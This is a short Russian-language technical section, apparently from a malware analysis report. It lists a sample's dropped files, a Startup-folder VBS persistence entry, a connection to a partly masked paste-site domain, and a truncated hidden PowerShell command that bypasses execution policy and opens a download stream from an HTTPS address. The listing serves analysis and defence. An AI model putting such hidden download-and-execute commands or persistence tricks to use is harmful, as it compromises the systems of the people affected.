Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\Az3r.vbs (папка автозагрузки пользователя: файл запускается при входе в систему)
- %TEMP%\setup.exe
- %TEMP%\Az3r.vbs
- %TEMP%\nsy2.tmp
- %TEMP%\nst3.tmp\System.dll
- 'localhost':1037
- 'pa###bin.com':443 (часть имени домена заменена символами ###)
- DNS ASK pa###bin.com (DNS-запрос этого же имени)
- '<SYSTEM32>\wscript.exe' "%TEMP%\Az3r.vbs"
- '%TEMP%\setup.exe'
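- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a....
  Примечание: командная строка в источнике обрезана. По видимой части: PowerShell запускается через cmd.exe в скрытом окне с обходом политики выполнения и открывает поток по HTTPS-адресу.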